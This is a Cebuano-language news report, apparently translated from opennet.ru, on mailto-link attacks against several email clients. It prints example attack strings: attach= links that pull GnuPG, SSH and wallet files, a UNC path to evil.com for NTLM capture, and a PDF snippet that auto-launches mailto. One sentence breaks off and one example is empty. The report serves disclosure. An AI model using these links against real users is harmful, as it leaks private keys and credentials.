Mga tigdukiduki gikan sa Ruhr University Bochum (Germany)
Mga link «
Ang mga kliyente sa mail nga Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) ug Pegasus Mail dali nga maapektuhan sa usa ka gamay nga pag-atake nga nagtugot kanimo nga awtomatiko nga maglakip bisan unsang lokal nga payl, gipiho pinaagi sa link sama sa "mailto:?attach=path_to_file". Ang file gilakip nga wala magpakita usa ka pasidaan, busa kung wala’y espesyal nga atensyon, ang tiggamit mahimo’g dili makamatikod nga ang sulat ipadala uban ang usa ka kalakip.
Pananglitan, gamit ang usa ka link sama sa "mailto:[protektado sa email]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" pwede nimong isulod ang private keys gikan sa GnuPG ngadto sa letter. Mahimo usab nimo ipadala ang mga sulod sa crypto wallet (~/.bitcoin/wallet.dat), SSH keys (~/.ssh/id_rsa) ug bisan unsang mga file nga ma-access sa user. Dugang pa, gitugotan ka sa Thunderbird nga ilakip ang mga grupo sa mga file pinaagi sa maskara gamit ang mga konstruksyon sama sa "attach=/tmp/*.txt".
Dugang sa lokal nga mga file, ang pipila ka mga email client nagproseso sa mga link sa pagtipig sa network ug mga agianan sa IMAP server. Sa partikular, ang IBM Notes nagtugot kanimo sa pagbalhin sa usa ka file gikan sa usa ka network directory sa diha nga ang pagproseso sa mga link sama sa "attach=\\ evil.com\dummyfile", ingon man usab sa intercept NTLM authentication parameters pinaagi sa pagpadala sa usa ka link ngadto sa usa ka SMB server nga kontrolado sa tig-atake. (ang hangyo ipadala uban sa kasamtangan nga authentication parameters user).
Malampuson nga giproseso sa Thunderbird ang mga hangyo sama sa "attach=imap:///fetch>UID>/INBOX>1/", nga nagtugot kanimo sa pag-attach sa sulod gikan sa mga folder sa IMAP server. Sa samang higayon, ang mga mensahe nga nakuha gikan sa IMAP, gi-encrypt pinaagi sa OpenPGP ug S/MIME, awtomatik nga gi-decrypt sa mail client sa dili pa ipadala. Ang mga nag-develop sa Thunderbird mao ang
Ang mga daan nga bersyon sa Thunderbird mahuyang usab sa duha ka laing mga variant sa pag-atake sa PGP ug S/MIME nga gisugyot sa mga tigdukiduki. Sa partikular, ang Thunderbird, ingon man ang OutLook, PostBox, eM Client, MailMate ug R2Mail2, gipailalom sa usa ka yawe nga puli nga pag-atake, tungod sa kamatuoran nga ang mail client awtomatik nga nag-import ug nag-instalar sa bag-ong mga sertipiko nga gipadala sa mga mensahe sa S/MIME, nga nagtugot ang tig-atake aron organisahon ang pagpuli sa mga yawe sa publiko nga gitipigan na sa tiggamit.
Ang ikaduha nga pag-atake, diin ang Thunderbird, PostBox ug MailMate daling maapektuhan, nagmaniobra sa mga bahin sa mekanismo alang sa autosaving draft nga mga mensahe ug gitugotan, gamit ang mailto nga mga parameter, aron masugdan ang pag-decryption sa mga naka-encrypt nga mensahe o pagdugang usa ka digital nga pirma alang sa arbitraryong mga mensahe, nga adunay sunod nga pagpasa sa resulta ngadto sa IMAP server sa tig-atake. Niini nga pag-atake, ang ciphertext gipasa pinaagi sa parameter nga "lawas", ug ang "meta refresh" tag gigamit sa pagsugod sa usa ka tawag sa IMAP server sa tig-atake. Pananglitan: ' '
Aron awtomatiko nga maproseso ang "mailto:" nga mga link nga wala’y interaksyon sa gumagamit, ang espesyal nga gidisenyo nga mga dokumento sa PDF mahimong magamit - ang aksyon sa OpenAction sa PDF nagtugot kanimo nga awtomatiko nga ilunsad ang mailto handler kung magbukas sa usa ka dokumento:
%PDF-1.5
1 obj
<< /Type /Catalog /OpenAction [2 0 R] >>
endobj
2 obj
<< /Type /Action /S /URI/URI (mailto:?body=——SUGOD PGP MENSAHE——[…])>>
endobj
Source: opennet.ru